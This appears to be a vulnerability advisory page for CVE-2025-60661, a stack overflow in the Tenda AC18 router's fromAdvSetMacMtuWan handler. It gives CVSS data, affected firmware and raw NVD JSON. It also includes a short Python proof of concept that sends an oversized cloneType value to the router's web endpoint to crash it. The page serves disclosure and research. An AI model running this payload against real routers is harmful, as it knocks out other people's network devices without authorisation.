Security Vulnerability Report
中文
CVE-2025-60661 CVSS 5.3 MEDIUM

CVE-2025-60661

Published: 2025-10-02 17:16:09
Last Modified: 2025-10-07 17:30:13

Description

Tenda AC18 V15.03.05.19 was discovered to contain a stack overflow via the cloneType parameter in the fromAdvSetMacMtuWan function.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:tenda:ac18_firmware:15.03.05.19:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:ac18:-:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda AC18 V15.03.05.19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60661 PoC - Tenda AC18 Stack Overflow via cloneType parameter # Vulnerability: Stack buffer overflow in fromAdvSetMacMtuWan function # Affected: Tenda AC18 V15.03.05.19 import requests import sys TARGET = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.1" PORT = 80 # Construct the overflow payload # cloneType parameter is passed without proper length validation # causing stack buffer overflow in fromAdvSetMacMtuWan payload = "A" * 1000 # Overflow buffer with excessive data # Build the malicious request to the router's web interface url = f"http://{TARGET}:{PORT}/goform/AdvSetMacMtuWan" data = { "cloneType": payload, "mac": "00:11:22:33:44:55", "mtu": "1500" } print(f"[*] Targeting Tenda AC18 at {TARGET}") print(f"[*] Sending stack overflow payload via cloneType parameter...") try: response = requests.post(url, data=data, timeout=10) print(f"[*] Response status: {response.status_code}") print("[*] Payload sent successfully") except requests.exceptions.RequestException as e: print(f"[!] Target may have crashed (DoS achieved): {e}") print("[*] Check if router is still responsive")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60661", "sourceIdentifier": "[email protected]", "published": "2025-10-02T17:16:08.817", "lastModified": "2025-10-07T17:30:13.020", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tenda AC18 V15.03.05.19 was discovered to contain a stack overflow via the cloneType parameter in the fromAdvSetMacMtuWan function."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ac18_firmware:15.03.05.19:*:*:*:*:*:*:*", "matchCriteriaId": "BA3A313A-5085-4ABB-92D0-A26208EE44FB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ac18:-:*:*:*:*:*:*:*", "matchCriteriaId": "CF9F8AF9-F921-4348-922B-EE5E6037E7AC"}]}]}], "references": [{"url": "https://drive.google.com/file/d/10bqMY1XighOBZ5D_Q8GtWFwhmxSN2GJw/view?usp=sharing", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}